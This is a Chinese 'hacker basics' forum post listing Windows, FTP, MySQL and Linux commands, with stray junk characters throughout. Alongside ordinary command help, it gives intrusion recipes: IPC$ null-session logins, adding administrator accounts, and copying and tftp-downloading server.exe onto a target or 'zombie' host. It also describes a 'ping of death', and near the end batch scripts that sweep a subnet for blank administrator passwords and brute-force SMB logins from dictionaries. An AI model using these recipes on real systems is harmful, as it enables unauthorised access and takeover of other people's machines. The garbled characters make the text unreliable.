黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接
6 J( d8 P% s0 \( i- fnet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 6 s* L: e' ^+ S9 V# D, u
net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: 8 X+ x" ~! i+ |7 a- u* u  L' x+ k* E
net use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: ) _4 E; z6 Q6 x! V. R; g0 r
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 7 z, F6 ]0 x5 o8 z
net use h: /del 删除映射对方到本地的为H:的映射
/ A' |: D# ]. ~* [6 `" Wnet user 用户名　密码　/add 建立用户
" J; ]$ j0 R6 q/ R/ }( U" Xnet user guest /active:yes 激活guest用户
9 L5 {$ f0 _6 U& a2 knet user 查看有哪些用户
+ B. U% `# S! S; E2 anet user 帐户名 查看帐户的属性
# N8 |7 c+ q% B: i( u' I# h" }& ?6 y4 lnet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
+ B8 k2 F1 J: z, O' e& Snet start 查看开启了哪些服务 , P. j1 c9 b  l7 ^
net start 服务名　 开启服务；(如:net start telnet， net start schedule)
. m5 J/ d7 X! S' Y6 _net stop 服务名 停止某服务 + ~- R4 Y/ F/ u5 X
net time \\目标ip 查看对方时间 ! G. c' p8 ?) O
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
- |: L/ q, h; x- e8 J; r, Gnet view 查看本地局域网内开启了哪些共享
$ d* }/ z. D. H# U7 @  z: Anet view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享
7 Y5 c8 u, S4 w0 ~  c; H6 p& Znet config 显示系统网络设置 ' j( H) u, W1 a" N
net logoff 断开连接的共享 % A8 r& m7 L5 y
net pause 服务名 暂停某服务 9 ?. @) D0 {1 Y; x6 Q) @' B
net send ip "文本信息" 向对方发信息 ! z6 E/ v$ l: K2 E; B
net ver 局域网内正在使用的网络连接类型和信息
0 `1 g) f% ]: h- F, Ynet share 查看本地开启的共享
4 G0 P0 P3 W; v; t1 E- Dnet share ipc$ 开启ipc$共享 6 P/ |2 Y8 `6 X6 [, z& S# [
net share ipc$ /del 删除ipc$共享
3 I  `. J9 X" \" |/ K6 }net share c$ /del 删除C：共享 4 c4 ?, c$ A( P* q# Y  D
net user guest 12345 用guest用户登陆后用将密码改为12345
8 R* y! w# [( g5 X: f. x$ F, a7 pnet password 密码 更改系统登陆密码 $ J! q# S( `- M7 }- I& ~
netstat -a 查看开启了哪些端口,常用netstat -an
" p" V7 o) m$ A" y4 M9 @netstat -n 查看端口的网络连接情况，常用netstat -an % t0 S0 u9 w$ S4 h2 I( l; ^
netstat -v 查看正在进行的工作
2 L9 @' E1 z, v7 ~* A9 ^* Hnetstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） ; r- m) y6 n+ X
netstat -s 查看正在使用的所有协议使用情况 ( F/ y  f% T$ s! C
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
6 m7 B% I) d, X& w! u. R' W/ y9 {# Ctracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
7 x; Y" ^* f+ o0 A5 t4 aping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。 4 B1 O: J* Z7 x+ A6 g
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
8 k' x  F0 {* }% i1 ^: n8 sipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息   @# p2 ?# `4 F. T. o3 X8 i
tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
% j& a! i$ T4 O, j" Y& m: M9 |kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
& R1 q  x/ i+ V. @) Rdel -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
0 b& [/ }+ D: @$ v( S. e# e1 x* `del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）   P$ u0 ^6 m4 ^# |, [% {2 O8 s
move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 1 y5 `: d7 X9 z! d9 g, ]
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令 * {8 i5 k" A0 a( S5 @: w2 @! b7 d
at id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
- M: V8 ~& W& R1 kat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 # V0 w/ [" X( H; _& {8 I) y& e
at id号 /delete 停止某个已注册的计划任务
% {- i  f2 G! E  H; ?4 F# pat 查看所有的计划任务 $ A: M* o2 v! s1 Y8 ?* J1 [
at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 8 B  e3 ?7 [3 R; |
finger username @host 查看最近有哪些用户登陆 ' [5 o6 m* I3 f+ N
telnet ip 端口 远和登陆服务器,默认端口为23
' \0 H, ~- E( n% \% Iopen ip 连接到IP（属telnet登陆后的命令）
  n+ H! {. j! T' r( `telnet 在本机上直接键入telnet 将进入本机的telnet . {9 |  ?8 y; \: T4 j0 l/ S0 O  E
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 $ i; x$ K9 `' V# \1 M8 v
copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下 : C$ I* s; l) \3 P% t
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 " E5 s1 T! }2 k5 B1 \
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： # f; s8 Z4 t  Z0 \3 N3 i
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
( H3 r) j+ }0 G7 o+ C) ]tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送 ' o% S- g' O+ b: x
tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机
. m( P" }: W6 Z' L1 u0 D# _ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
, Y+ Y$ z+ x" h, y# Qroute print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
; h' x2 J9 X& @6 rarp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
* b# ]4 F: a2 I9 y( c6 U$ A5 [start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令 ( q2 t$ V; @) j! Q3 t6 n% F7 G- W
mem 查看cpu使用情况 ; B( ]( e% @- `. c% w
attrib 文件名(目录名) 查看某文件（目录）的属性
' @7 G" n' i8 Z' A/ _attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
9 N0 o6 a/ T5 g/ W) ndir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
6 ?2 b! y8 I* G. adate /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
) g; O1 @% p* n$ I" Sset 指定环境变量名称=要指派给变量的字符 设置环境变量 / B/ s1 w& ~5 u2 \# M
set 显示当前所有的环境变量 2 I6 Y- }9 j% d$ q, c
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
& G$ |' O* X# P0 G  \: b! g" Apause 暂停批处理程序，并显示出：请按任意键继续.... 3 X  y( r4 @! a+ Z
if 在批处理程序中执行条件处理（更多说明见if命令及变量）
* d% d4 W: I, `5 _goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
  c. q5 q  _. \' e* N6 scall 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
( \  }; u; U% rfor 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） 6 j1 g! P7 V& P; y- y
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
4 c& T% u5 Y& M8 r9 h: K2 w. Wecho 信息 在屏幕上显示出信息
  Z6 Q8 r8 ?9 }' fecho 信息 >> pass.txt 将"信息"保存到pass.txt文件中
- p7 Q' s# R% h9 ~) cfindstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
: d6 t; b% ~) S3 xfind 文件名 查找某文件
5 _0 B  g7 V/ p+ F% C. w2 \# N( wtitle 标题名字 更改CMD窗口标题名字
4 s3 e+ ]; Y5 T* wcolor 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
4 F+ L6 S. k2 T- t0 }8 uprompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
  s1 k* m, J, p! V, o. |! @: Xprint 文件名 打印文本文件 $ i, q7 @# r8 u7 B% m* x5 V- i& [
ver 在DOS窗口下显示版本信息
" e/ L2 d: |6 j; d( X+ uwinver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
* t4 n+ _6 |  E; q. [: T" }format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS $ e4 J( @: R! u3 Q9 c/ Z9 p2 f
md　目录名 创建目录
+ @5 L0 W( i( J. f( N- @; r0 Rreplace 源文件　要替换文件的目录 替换文件
0 _7 t- h- S9 S$ B& lren 原文件名　新文件名 重命名文件名
1 f% S! ]. M; ?2 b' y& j3 ^tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称 . _6 U; N, I. o% O
type 文件名 显示文本文件的内容 - i3 P3 f' g$ t. I
more 文件名 逐屏显示输出文件
! T! Q3 _2 M8 F( @doskey 要锁定的命令＝字符
% T5 {6 n5 r3 K8 b) T, Jdoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir= & \: P. D. K" D$ W! O/ D
taskmgr 调出任务管理器
) G* S% N/ \$ g. U! fchkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 " y) \4 r+ f0 s0 i& v0 E
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口 1 Q0 {/ n/ p! y9 a7 `) G3 e
exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe 1 i. |% B$ x0 }
path 路径\可执行文件的文件名 为可执行文件设置一个路径。 / d1 Q0 R, N; e) C( U
cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?
2 _$ R8 Z. A, h' Oregedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示； 6 R9 z# o2 Z4 F
regedit /e 注册表文件名 导出注册表 5 E9 a$ x  S; K3 @) k
cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 % M+ }2 \5 X3 g( l
cacls 文件名 查看文件的访问用户权限列表
  U9 X$ n& o4 I: hREM 文本内容 在批处理文件中添加注解 8 A7 _0 v! I: J) p  m2 d
netsh 查看或更改本地网络配置情况+ n+ f' V) O' Y6 Z- q# h
IIS服务命令：
1 \+ Q1 r7 _3 w5 m8 U& a6 d- `iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
, d  [3 C. J& ?( a/ Fiisreset /start或stop 启动（停止）所有Internet服务 : m- G. J/ Q, M; S. D. r
iisreset /restart 停止然后重新启动所有Internet服务 0 l! L" E! g+ q* @  s9 N* y: K) F
iisreset /status 显示所有Internet服务状态
7 [2 }* Q; x2 \' S# k9 kiisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
. J: x' O7 R: A6 j! C4 |iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 1 P/ Q5 v3 g2 L
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
7 B  L8 |* p; I1 ?& X& P: Xiisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。 , b- Y* D, h) L& Z+ Y, b
FTP 命令： (后面有详细说明内容) 7 m! T/ _1 U! s+ I0 |
ftp的命令行格式为:
/ b; k- z/ D" r( ^3 I! ~' R6 w- Q7 rftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
# T+ q7 q% P- _: G% k$ C－d 使用调试方式。
) }9 I! _) w( C5 h& d) q－n 限制ftp的自动登录,即不使用.netrc文件。
& G" W% g2 L0 E" i－g 取消全局文件名。
; P% i- V$ p% zhelp [命令] 或 ？[命令] 查看命令说明
% j- _% l$ H* P% b; \5 _9 tbye 或 quit 终止主机FTP进程,并退出FTP管理方式.
$ l8 z- e9 C5 `. @1 npwd 列出当前远端主机目录 : @, y  G3 `" n" Q2 T7 q- r! m
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
: s8 j# A- d, ^! ?$ F) ^get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 3 z3 d; ~6 D* r' p0 n
mget [remote-files] 从远端主机接收一批文件至本地主机 " Z$ M! V" D& c. \6 I
mput local-files 将本地主机中一批文件传送至远端主机 7 g9 u( R2 T5 h8 O7 [7 Q0 r# Z
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 6 ~8 ^8 [$ S5 h% Z6 W; h
ascii 设定以ASCII方式传送文件(缺省值) 6 v0 D4 X9 q; M& i  [& U: j
bin 或 image 设定以二进制方式传送文件 + j) j( ?/ ]" j6 e- L0 U6 d
bell 每完成一次文件传送,报警提示
  S5 C+ W+ O5 V) r$ B( t9 tcdup 返回上一级目录
# r: l7 }& E' a9 d6 Sclose 中断与远程服务器的ftp会话(与open对应) 9 w! F7 d3 a: P% x( ?7 x
open host[port] 建立指定ftp服务器连接,可指定连接端口 * U0 X1 R3 |- _0 d% k& g7 ]
delete 删除远端主机中的文件 5 Z" A0 _; u6 x. p
mdelete [remote-files] 删除一批文件 & e. s2 |0 E  U
mkdir directory-name 在远端主机中建立目录 ; q' p) T6 E- R. a5 ]7 K' o
rename [from] [to] 改变远端主机中的文件名   R. `4 Y2 }6 b2 S# D; W
rmdir directory-name 删除远端主机中的目录
3 }5 m1 S" D# ?/ Fstatus 显示当前FTP的状态
* ~, o0 f' c3 Q) a, x) C$ t+ Ksystem 显示远端主机系统类型
: h3 ?: r8 ]: N/ \% ~user user-name [password] [account] 重新以别的用户名登录远端主机 5 O+ J/ ]3 r1 w) ^- D
open host [port] 重新建立一个新的连接
& U! L% }# b1 H% ?( w. nprompt 交互提示模式 7 _1 r( E- E) l
macdef 定义宏命令 + J1 u6 T, |# Q# q8 N' ?5 i
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 # Y) m3 M1 t6 X
chmod 改变远端主机的文件权限 8 _  U, c1 w& W9 Q0 e2 ?  D& ?
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 . D/ @( L% O8 n
cd remote－dir 进入远程主机目录   t4 Y, A" j% j7 S* ?
cdup 进入远程主机目录的父目录 & p0 w2 J  a/ b* r; K
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip
" H8 M2 ^8 c0 t% fMYSQL 命令： : C4 n* {2 y. ^/ S
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。% c  V( E+ i! S# v! T* ?
（例：mysql -h110.110.110.110 -Uroot -P123456
# C% H! f+ M& K, j' ]! {注:u与root可以不用加空格，其它也一样） * q- @) D; N  J/ p7 E4 N+ y
exit 退出MYSQL 0 d0 B7 l0 a& e& I
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
  t/ O. T! W: T' {4 F' l, ?3 wgrant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
' r0 @5 `8 N1 \5 N/ h2 A# D& gshow databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。 % [+ z) E: R4 F5 S( S8 b
use mysql；, T$ S2 {2 s$ Z
show tables; 显示库中的数据表   P' W, R; b9 z4 x
describe 表名; 显示数据表的结构 * o/ u, M! |( r: H9 i- V5 |+ J' I
create database 库名; 建库   t# ?! u3 T* ~
use 库名；! j3 s" T5 M, ~, L. f  t: L1 `
create table 表名 (字段设定列表)； 建表 * G7 ~" F2 L6 E! T$ I9 O2 \
drop database 库名;
, s  a8 O' u, K9 W/ i4 j5 t% ]$ }drop table 表名； 删库和删表
6 Z4 o# g) ~6 V' M7 `% |3 K) pdelete from 表名; 将表中记录清空
, n. ?, ~8 z- T; B7 t4 q% [select * from 表名; 显示表中的记录 ; L+ F" J( P4 J( F  h1 l% u4 o
mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 ; k4 S) b5 O  _+ n. J- S9 H
win2003系统下新增命令（实用部份）：
$ [' v' k1 D- e+ U% M" v$ eshutdown /参数 关闭或重启本地或远程主机。/ W7 T+ Z; u( Z/ ^
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
2 K8 e* `' i0 d( d7 B, a例：shutdown /r /t 0 立即重启本地主机（无延时） 9 b+ r3 h* E2 r# e
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
' K' t# C0 B. E" R% o# ~. |参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。
, C4 J/ H8 ~4 d7 r, q% U- e* mtasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。  v; X3 U3 w% t7 {6 l+ G
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程
  G4 S  ?7 g$ k3 J' @% fLinux系统下基本命令： 要区分大小写1 t4 i* V3 p$ {" k( V* [$ g  a
uname 显示版本信息（同win2K的 ver）
8 N0 s% E; o* i  c; y# n9 ]dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
2 c4 n7 V9 E7 A" s5 ypwd 查询当前所在的目录位置
8 t8 B  F' ~$ U2 ~8 F% I' Acd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。 - ^6 E$ W( @1 r- U' h8 P
cat 文件名 查看文件内容 * P. n4 v+ E# u; R4 P1 K7 _# O6 c7 P
cat >abc.txt 往abc.txt文件中写上内容。 : c* Y5 ]( ]9 x8 i" E+ E
more 文件名 以一页一页的方式显示一个文本文件。 3 j6 k) c4 H; f
cp 复制文件
$ o% ~/ @# q$ n! I0 Lmv 移动文件
+ l9 y- k3 }7 S7 O8 O" Prm 文件名 删除文件，rm -a 目录名删除目录及子目录
. E# E4 d& c' r. A* Mmkdir 目录名 建立目录 ' @# x3 y" X1 d8 T2 b% S
rmdir 删除子目录，目录内没有文档。 & F+ N% X  P, u: ^$ @6 Y
chmod 设定档案或目录的存取权限
; E$ r6 L! Q& I5 Y- qgrep 在档案中查找字符串
- ~- P3 J* z2 b9 hdiff 档案文件比较
  J% S, ~* M  g: nfind 档案搜寻 . B: U" k# {4 T  b7 r7 y
date 现在的日期、时间   j- z& _; X' h* v' g. Y. @
who 查询目前和你使用同一台机器的人以及Login时间地点
  p: b/ j4 Q' ^7 v  Mw 查询目前上机者的详细资料
6 h8 M; K3 u- M5 T0 pwhoami 查看自己的帐号名称 8 N* a4 B# g! F' ~- Z$ P& ]0 S
groups 查看某人的Group
! T" D- Q- O1 p/ Z8 rpasswd 更改密码 / i8 q8 T% r) O& ~
history 查看自己下过的命令 9 {8 u5 M5 a7 r6 D) T$ n
ps 显示进程状态
( l: K+ i' C' M7 K* Xkill 停止某进程 ! c& Y% |# X* n: p9 L- ~( A, F
gcc 黑客通常用它来编译C语言写的文件
; i/ v2 T$ f, msu 权限转换为指定使用者
' G4 [. h' U# K) d; L, V" wtelnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。 + V3 o, Z5 r# S" X5 L
ftp ftp连接上某服务器（同win2K1 b/ F  B4 W9 N
附：批处理命令与变量' `6 e4 U. {& M. E: \
1：for命令及变量 基本格式： : ^; O9 a( T, ^* n
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
- Y0 `/ o, J2 @* v0 R批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%37 ?5 z2 v. a3 l) w4 |* I
(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}
4 F* [, ], h5 i8 Wcommand：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
! {( r  i4 u, Z* V& D" }1 d* \! Q$ @- tcommand_parameters：为特定命令指定参数或命令行开关
/ k; U: a6 [2 a, {3 QIN (set)：指在(set)中取值；DO command ：指执行command$ |! {8 k4 J6 `7 ?8 j; a6 i
参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。
8 ^( t5 q* H3 s- b. I) U用法举例： 4 m) x8 j4 ^% l: U- e3 L3 ]
@echo off   M9 \& L* q+ T3 X, t4 O
echo 用法格式：test.bat *.*.* > test.txt
. b) U: L! o  |9 @. [for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
4 s4 L" u, X' @4 B5 |# ]& F存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。
' P6 {+ d6 x1 t9 R/ g: {- d3 h2 ?7 J2 I/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 1 ]' [& o8 e. Y  l: t. g5 _
@echo off . z1 ^+ T$ `, R: B! C
echo 用法格式：ok.bat ip
0 u: f' C2 G. X2 A* I4 L2 B( X" k1 yFOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
; X0 W  ]3 r$ O. m6 }( z; e存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。
) S# l3 w7 ?) a! \' b+ n2：if命令及变量 基本格式：
6 O; l3 f2 q% l+ H9 N/ J% i% Z6 WIF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。9 w! `* A* w. {) w2 M4 T' v
例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
/ L  M4 |, h2 B3 Y  N3 c1 I0 指发现并成功执行（真）；1 指没有发现、没执行（假）。 3 x9 K: _) t' p
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
/ }/ d/ ]! q% u$ ]例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）
7 J2 n5 i; G  p! R: UIF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。& @6 V' W* ^5 A' [! x
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。 " z7 P7 D4 d* n1 s* K
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”